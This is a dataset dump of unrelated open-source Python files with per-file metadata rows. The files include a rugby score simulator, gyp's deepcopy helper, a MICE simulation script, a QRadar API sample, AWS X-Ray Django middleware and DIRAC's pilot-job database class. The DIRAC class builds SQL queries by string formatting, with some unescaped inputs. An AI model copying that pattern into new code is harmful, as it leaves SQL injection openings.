a = math.sin(delta_lat/2)**2 + math.cos(olat)*math.cos(dlat)*math.sin(delta_lng/2)**2
return 4*math.atan2(math.sqrt(a), math.sqrt(1-a))/math.tau
def get_travel_weight(venue, home_lat, home_lng, reference_distance):
'''
Gets the travel weight based on a venue, a team's home lat/long coordinates, and a reference distance
'''
global stadium_locs
(venue_lat, venue_lng) = stadium_locs.loc[venue, ['Lat', 'Long']]
travel_distance = geodesic_distance(home_lat, home_lng, venue_lat, venue_lng)
return 1 - abs(travel_distance - reference_distance)
def get_score(expected_scores, score_array, n_sim, return_tries = True):
tf = sim_util.sim(expected_scores['T'][0], expected_scores['T'][1], n_sim)
cf = np.random.binomial(tf, expected_scores['C'])
pf = sim_util.sim(expected_scores['P'][0], expected_scores['P'][1], n_sim)
dgf = sim_util.sim(expected_scores['DG'][0], expected_scores['DG'][1], n_sim)
score = sim_util.calculate_score((tf, cf, pf, dgf), score_array)
if return_tries:
return score, tf
else:
return score
def matchup(team_1, team_2, venue = None):
ts = time.time()
global team_homes, stadium_locs
team_1_home = team_homes[1][team_1]
team_2_home = team_homes[1][team_2]
if venue is None:
venue = team_homes[1][team_1]
(venue_lat, venue_lng) = stadium_locs.loc[venue, ['Lat', 'Long']]
(team_1_home_lat, team_1_home_lng) = stadium_locs.loc[team_1_home, ['Lat', 'Long']]
(team_2_home_lat, team_2_home_lng) = stadium_locs.loc[team_2_home, ['Lat', 'Long']]
team_1_reference_distance = geodesic_distance(team_1_home_lat, team_1_home_lng, venue_lat, venue_lng)
team_2_reference_distance = geodesic_distance(team_2_home_lat, team_2_home_lng, venue_lat, venue_lng)
def get_team_1_weight(location):
return get_travel_weight(location, team_1_home_lat, team_1_home_lng, team_1_reference_distance)
def get_team_2_weight(location):
return get_travel_weight(location, team_2_home_lat, team_2_home_lng, team_2_reference_distance)
team_1_season = pd.DataFrame.from_csv(os.path.join(teamsheetpath, team_1 + '.csv'))
team_2_season = pd.DataFrame.from_csv(os.path.join(teamsheetpath, team_2 + '.csv'))
team_1_season['Weight'] = team_1_season['VENUE'].apply(get_team_1_weight)
team_2_season['Weight'] = team_2_season['VENUE'].apply(get_team_2_weight)
stats_1, variances_1 = get_residual_performance(team_1_season)
stats_2, variances_2 = get_residual_performance(team_2_season)
expected_scores_1 = get_expected_scores(stats_1, stats_2, team_1_season, team_2_season)
expected_scores_2 = get_expected_scores(stats_2, stats_1, team_2_season, team_1_season)
var_1 = pd.Series(0.25*(variances_1.loc[['TF', 'PF', 'DF']].values + variances_2.loc[['TA', 'PA', 'DGA']].values), ['T', 'P', 'DG'])
var_2 = pd.Series(0.25*(variances_2.loc[['TF', 'PF', 'DF']].values + variances_1.loc[['TA', 'PA', 'DGA']].values), ['T', 'P', 'DG'])
for stat in var_1.index:
if math.isnan(var_1[stat]):
var_1[stat] = expected_scores_1[stat]
if math.isnan(var_2[stat]):
var_2[stat] = expected_scores_2[stat]
score_array = [5, 2, 3, 3]
n_sim = int(5e6)
expected_scores_1a = {'T': (expected_scores_1['T'], var_1['T']),
'C': expected_scores_1['CONPROB'],
'P': (expected_scores_1['P'], var_1['P']),
'DG': (expected_scores_1['DG'], var_1['DG'])}
expected_scores_2a = {'T': (expected_scores_2['T'], var_2['T']),
'C': expected_scores_2['CONPROB'],
'P': (expected_scores_2['P'], var_2['P']),
'DG': (expected_scores_2['DG'], var_2['DG'])}
print(expected_scores_1a)
print(expected_scores_2a)
ts = time.time()
(team_1_scores, team_1_tries) = get_score(expected_scores_1a, score_array, n_sim)
(team_2_scores, team_2_tries) = get_score(expected_scores_2a, score_array, n_sim)
te = time.time()
print(te - ts)
(team_1_wins, team_2_wins, draws) = sim_util.eval_results(team_1_scores, team_2_scores, po)
(team_1_tb, team_2_tb) = sim_util.eval_try_bonus(team_1_tries, team_2_tries, 3)
(team_1_lb, team_2_lb) = sim_util.eval_losing_bonus(team_1_scores, team_2_scores, 7)
team_1_prob = team_1_wins.mean()
team_2_prob = team_2_wins.mean()
draw_prob = draws.mean()
team_1_bpw_prob = (team_1_tb * team_1_wins).mean()
team_1_bpd_prob = (team_1_tb * draws).mean()
team_1_bpl_prob = (team_1_tb * team_2_wins).mean()
team_1_lbp_prob = (team_1_lb).mean()
team_2_bpw_prob = (team_2_tb * team_2_wins).mean()
team_2_bpd_prob = (team_2_tb * draws).mean()
team_2_bpl_prob = (team_2_tb * team_1_wins).mean()
team_2_lbp_prob = (team_2_lb).mean()
games = pd.DataFrame.from_items([(team_1, team_1_scores), (team_2, team_2_scores)])
pre_summaries = games.describe(percentiles = list(np.linspace(0.05, 0.95, 19)))
summaries = pd.DataFrame(columns = pre_summaries.columns)
summaries.loc['mean'] = pre_summaries.loc['mean']
for i in pre_summaries.index:
try:
percentile = int(round(float(i[:-1])))
summaries.loc['{}%'.format(percentile)] = pre_summaries.loc[i]
except ValueError:
continue
summaries = summaries.reset_index()
for item in summaries.index:
try:
summaries['index'][item] = str(int(float(summaries['index'][item][:-1]))) + '%'
except ValueError:
continue
bonus_points = pd.DataFrame(index = ['4-Try Bonus Point with Win',
'4-Try Bonus Point with Draw',
'4-Try Bonus Point with Loss',
'Losing Bonus Point'])
bonus_points[team_1] = [team_1_bpw_prob, team_1_bpd_prob, team_1_bpl_prob, team_1_lbp_prob]
bonus_points[team_2] = [team_2_bpw_prob, team_2_bpd_prob, team_2_bpl_prob, team_2_lbp_prob]
summaries = summaries.set_index('index')
summaries = summaries.groupby(level = 0).last()
output = {'ProbWin': {team_1: team_1_prob, team_2: team_2_prob}, 'Scores': summaries, 'Bonus Points': bonus_points}
print(team_1 + '/' + team_2 + ' score distributions computed in ' + str(round(time.time() - ts, 1)) + ' seconds')
return output | mit | 3,946,143,101,696,154,000 | 39.29927 | 162 | 0.55899 | false |
pyokagan/gyp | pylib/gyp/simple_copy.py | 1 | 1385 | # Copyright 2014 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A clone of the default copy.deepcopy that doesn't handle cyclic
structures or complex types except for dicts and lists. This is
because gyp copies so large structure that small copy overhead ends up
taking seconds in a project the size of Chromium."""
import sys
_PYTHON3 = sys.version_info >= (3, 0, 0)
if _PYTHON3:
long = int
unicode = str
class Error(Exception):
pass
__all__ = ["Error", "deepcopy"]
def deepcopy(x):
"""Deep copy operation on gyp objects such as strings, ints, dicts
and lists. More than twice as fast as copy.deepcopy but much less
generic."""
try:
return _deepcopy_dispatch[type(x)](x)
except KeyError:
raise Error('Unsupported type %s for deepcopy. Use copy.deepcopy ' +
'or expand simple_copy support.' % type(x))
_deepcopy_dispatch = d = {}
def _deepcopy_atomic(x):
return x
for x in (type(None), int, long, float,
bool, str, unicode, type):
d[x] = _deepcopy_atomic
def _deepcopy_list(x):
return [deepcopy(a) for a in x]
d[list] = _deepcopy_list
def _deepcopy_dict(x):
y = {}
for key, value in x.items():
y[deepcopy(key)] = deepcopy(value)
return y
d[dict] = _deepcopy_dict
del d
# vim: expandtab tabstop=2 shiftwidth=2:
| bsd-3-clause | 4,918,599,992,610,725,000 | 22.474576 | 72 | 0.680866 | false |
mice-software/maus | bin/user/simulate_mice.py | 1 | 2151 | #!/usr/bin/env python
"""
Simulate the MICE experiment
This will simulate MICE spills through the entirety of MICE using Geant4, then
digitize and reconstruct TOF and tracker hits to space points.
"""
import io # generic python library for I/O
import MAUS # MAUS libraries
def run():
""" Run the macro
"""
# This input generates empty spills, to be filled by the beam maker later on
my_input = MAUS.InputPySpillGenerator()
# Create an empty array of mappers, then populate it
# with the functionality you want to use.
my_map = MAUS.MapPyGroup()
# GEANT4
my_map.append(MAUS.MapPyBeamMaker()) # beam construction
my_map.append(MAUS.MapCppSimulation()) # geant4 simulation
# Pre detector set up
# my_map.append(MAUS.MapPyMCReconSetup()) # geant4 simulation
my_map.append(MAUS.MapCppMCReconSetup()) # geant4 simulation
# TOF
my_map.append(MAUS.MapCppTOFMCDigitizer()) # TOF MC Digitizer
my_map.append(MAUS.MapCppTOFSlabHits()) # TOF MC Slab Hits
my_map.append(MAUS.MapCppTOFSpacePoints()) # TOF Space Points
# KL
my_map.append(MAUS.MapCppKLMCDigitizer()) # KL MC Digitizer
my_map.append(MAUS.MapCppKLCellHits()) # KL CellHit Reco
# SciFi
my_map.append(MAUS.MapCppTrackerMCDigitization()) # SciFi electronics model
my_map.append(MAUS.MapCppTrackerRecon()) # SciFi Recon
# EMR
my_map.append(MAUS.MapCppEMRMCDigitization()) # EMR MC Digitizer
my_map.append(MAUS.MapCppEMRSpacePoints()) # EMR Space Points
my_map.append(MAUS.MapCppEMRRecon()) # EMR Recon
# Ckov
my_map.append(MAUS.MapCppCkovMCDigitizer())
# Global Digits - post detector digitisation
# Then construct a MAUS output component - filename comes from datacards
my_output = MAUS.OutputCppRoot()
# can specify datacards here or by using appropriate command line calls
datacards = io.StringIO(u"")
# The Go() drives all the components you pass in, then check the file
# (default simulation.out) for output
MAUS.Go(my_input, my_map, MAUS.ReducePyDoNothing(), my_output, datacards)
if __name__ == '__main__':
run()
| gpl-3.0 | -5,412,434,296,677,713,000 | 30.632353 | 80 | 0.699675 | false |
ibm-security-intelligence/api-samples | data_classification/02_LowLevelCategories.py | 1 | 2598 | #!/usr/bin/env python3
# This sample script demonstrates how to
# 1. get a list of low level categories
# 2. get a single low level category by its id
import importlib
import json
import os
import sys
sys.path.append(os.path.realpath('../modules'))
client_module = importlib.import_module('RestApiClient')
SampleUtilities = importlib.import_module('SampleUtilities')
def main():
# create the api client
client = client_module.RestApiClient(version='7.0')
# -------------------------------------------------------------------------
# 1. get a list of low level categories
endpoint_url = 'data_classification/low_level_categories'
http_method = 'GET'
# 'fields' is used to limit the fields returned for each record
fields = 'id, name'
# 'query_filter' is used to filter the list returned based on field values
# low_level_category_id can be used in the filter to get a list of low
# level categories belonging to the specified high level category
query_filter = 'high_level_category_id = 4000'
# 'sort' is used to sort list based on applicable fields
sort = '+id'
# populate the optional parameters to be used in request
params = {'fields': fields, 'filter': query_filter, 'sort': sort}
# send the request
response = client.call_api(endpoint_url, http_method, params=params,
print_request=True)
# check response and handle any error
if response.code == 200:
# extract records from response
low_level_categories = json.loads(response.read().decode('utf-8'))
print(low_level_categories)
else:
print('Failed to get the list of low level categories')
SampleUtilities.pretty_print_response(response)
sys.exit(1)
# -------------------------------------------------------------------------
# 2. get a single low level category by its id
low_level_category_id = 3001
endpoint_url = ('data_classification/low_level_categories' + '/' +
str(low_level_category_id))
# send the request
response = client.call_api(endpoint_url, http_method, print_request=True)
# check response and handle any error
if response.code == 200:
# extract record from response
low_level_category = json.loads(response.read().decode('utf-8'))
print(low_level_category)
else:
print('Failed to get the low level category with id=' +
str(low_level_category_id))
SampleUtilities.pretty_print_response(response)
if __name__ == "__main__":
main()
| apache-2.0 | 4,357,113,796,614,164,000 | 32.74026 | 79 | 0.624326 | false |
lukaasp/libs | aws_xray_sdk/ext/django/middleware.py | 1 | 3458 | import logging
import traceback
from aws_xray_sdk.core import xray_recorder
from aws_xray_sdk.core.models import http
from aws_xray_sdk.core.models.trace_header import TraceHeader
log = logging.getLogger(__name__)
# Django will rewrite some http request headers.
USER_AGENT_KEY = 'HTTP_USER_AGENT'
X_FORWARDED_KEY = 'HTTP_X_FORWARDED_FOR'
REMOTE_ADDR_KEY = 'REMOTE_ADDR'
XRAY_HEADER_KEY = 'HTTP_X_AMZN_TRACE_ID'
HOST_KEY = 'HTTP_HOST'
CONTENT_LENGTH_KEY = 'content-length'
class XRayMiddleware(object):
"""
Middleware that wraps each incoming request to a segment.
"""
def __init__(self, get_response):
self.get_response = get_response
# hooks for django version >= 1.10
def __call__(self, request):
# a segment name is required
name = xray_recorder.service
xray_header = self._get_tracing_header(request)
if not xray_header:
xray_header = TraceHeader()
sampling_decision = None
meta = request.META
# sampling decision from incoming request's header has highest precedence
if xray_header.sampled is not None:
sampling_decision = xray_header.sampled
elif not xray_recorder.sampling:
sampling_decision = 1
elif xray_recorder.sampler.should_trace(
service_name=meta.get(HOST_KEY),
method=request.method,
path=request.path,
):
sampling_decision = 1
else:
sampling_decision = 0
segment = xray_recorder.begin_segment(
name=name,
traceid=xray_header.root,
parent_id=xray_header.parent,
sampling=sampling_decision,
)
segment.put_http_meta(http.URL, request.build_absolute_uri())
segment.put_http_meta(http.METHOD, request.method)
if meta.get(USER_AGENT_KEY):
segment.put_http_meta(http.USER_AGENT, meta.get(USER_AGENT_KEY))
if meta.get(X_FORWARDED_KEY):
# X_FORWARDED_FOR may come from untrusted source so we
# need to set the flag to true as additional information
segment.put_http_meta(http.CLIENT_IP, meta.get(X_FORWARDED_KEY))
segment.put_http_meta(http.X_FORWARDED_FOR, True)
elif meta.get(REMOTE_ADDR_KEY):
segment.put_http_meta(http.CLIENT_IP, meta.get(REMOTE_ADDR_KEY))
response = self.get_response(request)
status_code = int(response.status_code)
segment.apply_status_code(status_code)
segment.put_http_meta(http.STATUS, status_code)
if response.has_header(CONTENT_LENGTH_KEY):
length = int(response[CONTENT_LENGTH_KEY])
segment.put_http_meta(http.CONTENT_LENGTH, length)
xray_recorder.end_segment()
return response
def process_exception(self, request, exception):
"""
Add exception information and fault flag to the
current segment.
"""
segment = xray_recorder.current_segment()
segment.add_fault_flag()
stack = traceback.extract_stack(limit=xray_recorder._max_trace_back)
segment.add_exception(exception, stack)
def _get_tracing_header(self, request):
header = request.META.get(http.XRAY_HEADER)
if not header:
header = request.META.get(XRAY_HEADER_KEY)
if not header:
return None
return TraceHeader.from_header_str(header)
| unlicense | -9,111,171,738,209,037,000 | 31.622642 | 81 | 0.633892 | false |
yujikato/DIRAC | src/DIRAC/WorkloadManagementSystem/DB/PilotAgentsDB.py | 1 | 43047 | """ PilotAgentsDB class is a front-end to the Pilot Agent Database.
This database keeps track of all the submitted grid pilot jobs.
It also registers the mapping of the DIRAC jobs to the pilot
agents.
Available methods are:
addPilotTQReference()
setPilotStatus()
deletePilot()
clearPilots()
setPilotDestinationSite()
storePilotOutput()
getPilotOutput()
setJobForPilot()
getPilotsSummary()
getGroupedPilotSummary()
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import six
import threading
import decimal
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Base.DB import DB
import DIRAC.Core.Utilities.Time as Time
from DIRAC.Core.Utilities import DErrno
from DIRAC.ConfigurationSystem.Client.Helpers.Resources import getCESiteMapping
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getUsernameForDN, getDNForUsername, getVOForGroup
from DIRAC.ResourceStatusSystem.Client.SiteStatus import SiteStatus
from DIRAC.Core.Utilities.MySQL import _quotedList
class PilotAgentsDB(DB):
def __init__(self):
super(PilotAgentsDB, self).__init__('PilotAgentsDB', 'WorkloadManagement/PilotAgentsDB')
self.lock = threading.Lock()
##########################################################################################
def addPilotTQReference(self, pilotRef, taskQueueID, ownerDN, ownerGroup, broker='Unknown',
gridType='DIRAC', pilotStampDict={}):
""" Add a new pilot job reference """
err = 'PilotAgentsDB.addPilotTQReference: Failed to retrieve a new Id.'
for ref in pilotRef:
stamp = ''
if ref in pilotStampDict:
stamp = pilotStampDict[ref]
res = self._escapeString(ownerDN)
if not res['OK']:
return res
escapedOwnerDN = res['Value']
req = "INSERT INTO PilotAgents( PilotJobReference, TaskQueueID, OwnerDN, " + \
"OwnerGroup, Broker, GridType, SubmissionTime, LastUpdateTime, Status, PilotStamp ) " + \
"VALUES ('%s',%d,%s,'%s','%s','%s',UTC_TIMESTAMP(),UTC_TIMESTAMP(),'Submitted','%s')" % \
(ref, int(taskQueueID), escapedOwnerDN, ownerGroup, broker, gridType, stamp)
result = self._update(req)
if not result['OK']:
return result
if 'lastRowId' not in result:
return S_ERROR('%s' % err)
return S_OK()
##########################################################################################
def setPilotStatus(self, pilotRef, status, destination=None,
statusReason=None, gridSite=None, queue=None,
benchmark=None, currentJob=None,
updateTime=None, conn=False):
""" Set pilot job status
"""
setList = []
setList.append("Status='%s'" % status)
if updateTime:
setList.append("LastUpdateTime='%s'" % updateTime)
else:
setList.append("LastUpdateTime=UTC_TIMESTAMP()")
if not statusReason:
statusReason = "Not given"
setList.append("StatusReason='%s'" % statusReason)
if gridSite:
setList.append("GridSite='%s'" % gridSite)
if queue:
setList.append("Queue='%s'" % queue)
if benchmark:
setList.append("BenchMark='%s'" % float(benchmark))
if currentJob:
setList.append("CurrentJobID='%s'" % int(currentJob))
if destination:
setList.append("DestinationSite='%s'" % destination)
if not gridSite:
res = getCESiteMapping(destination)
if res['OK'] and res['Value']:
setList.append("GridSite='%s'" % res['Value'][destination])
set_string = ','.join(setList)
req = "UPDATE PilotAgents SET " + set_string + " WHERE PilotJobReference='%s'" % pilotRef
result = self._update(req, conn=conn)
if not result['OK']:
return result
return S_OK()
# ###########################################################################################
# FIXME: this can't work ATM because of how the DB table is made. Maybe it would be useful later.
# def setPilotStatusBulk(self, pilotRefsStatusDict=None, statusReason=None,
# conn=False):
# """ Set pilot job status in a bulk
# """
# if not pilotRefsStatusDict:
# return S_OK()
# # Building the request with "ON DUPLICATE KEY UPDATE"
# reqBase = "INSERT INTO PilotAgents (PilotJobReference, Status, StatusReason) VALUES "
# for pilotJobReference, status in pilotRefsStatusDict.items():
# req = reqBase + ','.join("('%s', '%s', '%s')" % (pilotJobReference, status, statusReason))
# req += " ON DUPLICATE KEY UPDATE Status=VALUES(Status),StatusReason=VALUES(StatusReason)"
# return self._update(req, conn)
##########################################################################################
def selectPilots(self, condDict, older=None, newer=None, timeStamp='SubmissionTime',
orderAttribute=None, limit=None):
""" Select pilot references according to the provided criteria. "newer" and "older"
specify the time interval in minutes
"""
condition = self.buildCondition(condDict, older, newer, timeStamp)
if orderAttribute:
orderType = None
orderField = orderAttribute
if orderAttribute.find(':') != -1:
orderType = orderAttribute.split(':')[1].upper()
orderField = orderAttribute.split(':')[0]
condition = condition + ' ORDER BY ' + orderField
if orderType:
condition = condition + ' ' + orderType
if limit:
condition = condition + ' LIMIT ' + str(limit)
req = "SELECT PilotJobReference from PilotAgents"
if condition:
req += " %s " % condition
result = self._query(req)
if not result['OK']:
return result
pilotList = []
if result['Value']:
pilotList = [x[0] for x in result['Value']]
return S_OK(pilotList)
##########################################################################################
def countPilots(self, condDict, older=None, newer=None, timeStamp='SubmissionTime'):
""" Select pilot references according to the provided criteria. "newer" and "older"
specify the time interval in minutes
"""
condition = self.buildCondition(condDict, older, newer, timeStamp)
req = "SELECT COUNT(PilotID) from PilotAgents"
if condition:
req += " %s " % condition
result = self._query(req)
if not result['OK']:
return result
return S_OK(result['Value'][0][0])
#########################################################################################
def getPilotGroups(self, groupList=['Status', 'OwnerDN', 'OwnerGroup', 'GridType'], condDict={}):
"""
Get all exisiting combinations of groupList Values
"""
cmd = 'SELECT %s from PilotAgents ' % ', '.join(groupList)
condList = []
for cond in condDict:
condList.append('%s in ( "%s" )' % (cond, '", "'.join([str(y) for y in condDict[cond]])))
# the conditions should be escaped before hand, so it is not really nice to expose it this way...
if condList:
cmd += ' WHERE %s ' % ' AND '.join(condList)
cmd += ' GROUP BY %s' % ', '.join(groupList)
return self._query(cmd)
##########################################################################################
def deletePilots(self, pilotIDs, conn=False):
""" Delete Pilots with IDs in the given list from the PilotAgentsDB """
if not isinstance(pilotIDs, list):
return S_ERROR('Input argument is not a List')
failed = []
for table in ['PilotOutput', 'JobToPilotMapping', 'PilotAgents']:
idString = ','.join([str(pid) for pid in pilotIDs])
req = "DELETE FROM %s WHERE PilotID in ( %s )" % (table, idString)
result = self._update(req, conn=conn)
if not result['OK']:
failed.append(table)
if failed:
return S_ERROR('Failed to remove pilot from %s tables' % ', '.join(failed))
return S_OK(pilotIDs)
##########################################################################################
def deletePilot(self, pilotRef, conn=False):
""" Delete Pilot with the given reference from the PilotAgentsDB """
if isinstance(pilotRef, six.string_types):
pilotID = self.__getPilotID(pilotRef)
else:
pilotID = pilotRef
return self.deletePilots([pilotID], conn=conn)
##########################################################################################
def clearPilots(self, interval=30, aborted_interval=7):
""" Delete all the pilot references submitted before <interval> days """
reqList = []
reqList.append(
"SELECT PilotID FROM PilotAgents WHERE SubmissionTime < DATE_SUB(UTC_TIMESTAMP(),INTERVAL %d DAY)" %
interval)
reqList.append(
"SELECT PilotID FROM PilotAgents WHERE Status='Aborted' \
AND SubmissionTime < DATE_SUB(UTC_TIMESTAMP(),INTERVAL %d DAY)" %
aborted_interval)
idList = None
for req in reqList:
result = self._query(req)
if not result['OK']:
self.log.warn('Error while clearing up pilots')
else:
if result['Value']:
idList = [x[0] for x in result['Value']]
result = self.deletePilots(idList)
if not result['OK']:
self.log.warn('Error while deleting pilots')
return S_OK(idList)
##########################################################################################
def getPilotInfo(self, pilotRef=False, parentId=False, conn=False, paramNames=[], pilotID=False):
""" Get all the information for the pilot job reference or reference list
"""
parameters = ['PilotJobReference', 'OwnerDN', 'OwnerGroup', 'GridType', 'Broker',
'Status', 'DestinationSite', 'BenchMark', 'ParentID', 'OutputReady', 'AccountingSent',
'SubmissionTime', 'PilotID', 'LastUpdateTime', 'TaskQueueID', 'GridSite', 'PilotStamp',
'Queue']
if paramNames:
parameters = paramNames
cmd = "SELECT %s FROM PilotAgents" % ", ".join(parameters)
condSQL = []
if pilotRef:
if isinstance(pilotRef, list):
condSQL.append("PilotJobReference IN (%s)" % ",".join(['"%s"' % x for x in pilotRef]))
else:
condSQL.append("PilotJobReference = '%s'" % pilotRef)
if pilotID:
if isinstance(pilotID, list):
condSQL.append("PilotID IN (%s)" % ",".join(['%s' % x for x in pilotID]))
else:
condSQL.append("PilotID = '%s'" % pilotID)
if parentId:
if isinstance(parentId, list):
condSQL.append("ParentID IN (%s)" % ",".join(['%s' % x for x in parentId]))
else:
condSQL.append("ParentID = %s" % parentId)
if condSQL:
cmd = "%s WHERE %s" % (cmd, " AND ".join(condSQL))
result = self._query(cmd, conn=conn)
if not result['OK']:
return result
if not result['Value']:
msg = "No pilots found"
if pilotRef:
msg += " for PilotJobReference(s): %s" % pilotRef
if parentId:
msg += " with parent id: %s" % parentId
return S_ERROR(DErrno.EWMSNOPILOT, msg)
resDict = {}
pilotIDs = []
for row in result['Value']:
pilotDict = {}
for i in range(len(parameters)):
pilotDict[parameters[i]] = row[i]
if parameters[i] == 'PilotID':
pilotIDs.append(row[i])
resDict[row[0]] = pilotDict
result = self.getJobsForPilot(pilotIDs)
if not result['OK']:
return S_OK(resDict)
jobsDict = result['Value']
for pilotRef in resDict:
pilotInfo = resDict[pilotRef]
pilotID = pilotInfo['PilotID']
if pilotID in jobsDict:
pilotInfo['Jobs'] = jobsDict[pilotID]
return S_OK(resDict)
##########################################################################################
def setPilotDestinationSite(self, pilotRef, destination, conn=False):
""" Set the pilot agent destination site
"""
gridSite = 'Unknown'
res = getCESiteMapping(destination)
if res['OK'] and res['Value']:
gridSite = res['Value'][destination]
req = "UPDATE PilotAgents SET DestinationSite='%s', GridSite='%s' WHERE PilotJobReference='%s'"
req = req % (destination, gridSite, pilotRef)
return self._update(req, conn=conn)
##########################################################################################
def setPilotBenchmark(self, pilotRef, mark):
""" Set the pilot agent benchmark
"""
req = "UPDATE PilotAgents SET BenchMark='%f' WHERE PilotJobReference='%s'" % (mark, pilotRef)
result = self._update(req)
return result
##########################################################################################
def setAccountingFlag(self, pilotRef, mark='True'):
""" Set the pilot AccountingSent flag
"""
req = "UPDATE PilotAgents SET AccountingSent='%s' WHERE PilotJobReference='%s'" % (mark, pilotRef)
result = self._update(req)
return result
##########################################################################################
def storePilotOutput(self, pilotRef, output, error):
""" Store standard output and error for a pilot with pilotRef
"""
pilotID = self.__getPilotID(pilotRef)
if not pilotID:
return S_ERROR('Pilot reference not found %s' % pilotRef)
result = self._escapeString(output)
if not result['OK']:
return S_ERROR('Failed to escape output string')
e_output = result['Value']
result = self._escapeString(error)
if not result['OK']:
return S_ERROR('Failed to escape error string')
e_error = result['Value']
req = "INSERT INTO PilotOutput (PilotID,StdOutput,StdError) VALUES (%d,%s,%s)" % (pilotID, e_output, e_error)
result = self._update(req)
if not result['OK']:
return result
req = "UPDATE PilotAgents SET OutputReady='True' where PilotID=%d" % pilotID
return self._update(req)
##########################################################################################
def getPilotOutput(self, pilotRef):
""" Retrieve standard output and error for pilot with pilotRef
"""
req = "SELECT StdOutput, StdError FROM PilotOutput,PilotAgents WHERE "
req += "PilotOutput.PilotID = PilotAgents.PilotID AND PilotAgents.PilotJobReference='%s'" % pilotRef
result = self._query(req)
if not result['OK']:
return result
else:
if result['Value']:
stdout = result['Value'][0][0]
error = result['Value'][0][1]
if stdout == '""':
stdout = ''
if error == '""':
error = ''
return S_OK({'StdOut': stdout, 'StdErr': error})
else:
return S_ERROR('PilotJobReference ' + pilotRef + ' not found')
##########################################################################################
def __getPilotID(self, pilotRef):
""" Get Pilot ID for the given pilot reference or a list of references
"""
if isinstance(pilotRef, six.string_types):
req = "SELECT PilotID from PilotAgents WHERE PilotJobReference='%s'" % pilotRef
result = self._query(req)
if not result['OK']:
return 0
else:
if result['Value']:
return int(result['Value'][0][0])
return 0
else:
refString = ','.join(["'" + ref + "'" for ref in pilotRef])
req = "SELECT PilotID from PilotAgents WHERE PilotJobReference in ( %s )" % refString
result = self._query(req)
if not result['OK']:
return []
if result['Value']:
return [x[0] for x in result['Value']]
return []
##########################################################################################
def setJobForPilot(self, jobID, pilotRef, site=None, updateStatus=True):
""" Store the jobID of the job executed by the pilot with reference pilotRef
"""
pilotID = self.__getPilotID(pilotRef)
if pilotID:
if updateStatus:
reason = 'Report from job %d' % int(jobID)
result = self.setPilotStatus(pilotRef, status='Running', statusReason=reason,
gridSite=site)
if not result['OK']:
return result
req = "INSERT INTO JobToPilotMapping (PilotID,JobID,StartTime) VALUES (%d,%d,UTC_TIMESTAMP())" % (pilotID, jobID)
return self._update(req)
else:
return S_ERROR('PilotJobReference ' + pilotRef + ' not found')
##########################################################################################
def setCurrentJobID(self, pilotRef, jobID):
""" Set the pilot agent current DIRAC job ID
"""
req = "UPDATE PilotAgents SET CurrentJobID=%d WHERE PilotJobReference='%s'" % (jobID, pilotRef)
return self._update(req)
##########################################################################################
def getJobsForPilot(self, pilotID):
""" Get IDs of Jobs that were executed by a pilot
"""
cmd = "SELECT pilotID,JobID FROM JobToPilotMapping "
if isinstance(pilotID, list):
cmd = cmd + " WHERE pilotID IN (%s)" % ",".join(['%s' % x for x in pilotID])
else:
cmd = cmd + " WHERE pilotID = %s" % pilotID
result = self._query(cmd)
if not result['OK']:
return result
resDict = {}
for row in result['Value']:
if not row[0] in resDict:
resDict[row[0]] = []
resDict[row[0]].append(row[1])
return S_OK(resDict)
##########################################################################################
def getPilotsForTaskQueue(self, taskQueueID, gridType=None, limit=None):
""" Get IDs of Pilot Agents that were submitted for the given taskQueue,
specify optionally the grid type, results are sorted by Submission time
an Optional limit can be set.
"""
if gridType:
req = "SELECT PilotID FROM PilotAgents WHERE TaskQueueID=%s AND GridType='%s' " % (taskQueueID, gridType)
else:
req = "SELECT PilotID FROM PilotAgents WHERE TaskQueueID=%s " % taskQueueID
req += 'ORDER BY SubmissionTime DESC '
if limit:
req += 'LIMIT %s' % limit
result = self._query(req)
if not result['OK']:
return result
else:
if result['Value']:
pilotList = [x[0] for x in result['Value']]
return S_OK(pilotList)
return S_ERROR('PilotJobReferences for TaskQueueID %s not found' % taskQueueID)
##########################################################################################
def getPilotsForJobID(self, jobID):
""" Get ID of Pilot Agent that is running a given JobID
"""
result = self._query('SELECT PilotID FROM JobToPilotMapping WHERE JobID=%s' % jobID)
if not result['OK']:
self.log.error("getPilotsForJobID failed", result['Message'])
return result
if result['Value']:
pilotList = [x[0] for x in result['Value']]
return S_OK(pilotList)
self.log.warn('PilotID for job %d not found: not matched yet?' % jobID)
return S_OK([])
##########################################################################################
def getPilotCurrentJob(self, pilotRef):
""" The job ID currently executed by the pilot
"""
req = "SELECT CurrentJobID FROM PilotAgents WHERE PilotJobReference='%s' " % pilotRef
result = self._query(req)
if not result['OK']:
return result
if result['Value']:
jobID = int(result['Value'][0][0])
return S_OK(jobID)
self.log.warn('Current job ID for pilot %s is not known: pilot did not match jobs yet?' % pilotRef)
return S_OK()
##########################################################################################
# FIXME: investigate it getPilotSummaryShort can replace this method
def getPilotSummary(self, startdate='', enddate=''):
""" Get summary of the pilot jobs status by site
"""
st_list = ['Aborted', 'Running', 'Done', 'Submitted', 'Ready', 'Scheduled', 'Waiting']
summary_dict = {}
summary_dict['Total'] = {}
for st in st_list:
summary_dict['Total'][st] = 0
req = "SELECT DestinationSite,count(DestinationSite) FROM PilotAgents " + \
"WHERE Status='%s' " % st
if startdate:
req = req + " AND SubmissionTime >= '%s'" % startdate
if enddate:
req = req + " AND SubmissionTime <= '%s'" % enddate
req = req + " GROUP BY DestinationSite"
result = self._query(req)
if not result['OK']:
return result
else:
if result['Value']:
for res in result['Value']:
site = res[0]
count = res[1]
if site:
if site not in summary_dict:
summary_dict[site] = {}
summary_dict[site][st] = int(count)
summary_dict['Total'][st] += int(count)
# Get aborted pilots in the last hour, day
req = "SELECT DestinationSite,count(DestinationSite) FROM PilotAgents WHERE Status='Aborted' AND "
reqDict = {}
reqDict['Aborted_Hour'] = req + " LastUpdateTime >= DATE_SUB(UTC_TIMESTAMP(), INTERVAL 1 HOUR)"
reqDict['Aborted_Day'] = req + " LastUpdateTime >= DATE_SUB(UTC_TIMESTAMP(), INTERVAL 1 DAY)"
for key, req in reqDict.items():
result = self._query(req)
if not result['OK']:
break
if result['Value']:
for res in result['Value']:
site = res[0]
count = res[1]
if site:
if site in summary_dict:
summary_dict[site][key] = int(count)
return S_OK(summary_dict)
# def getPilotSummaryShort( self, startTimeWindow = None, endTimeWindow = None, ce = '' ):
# """
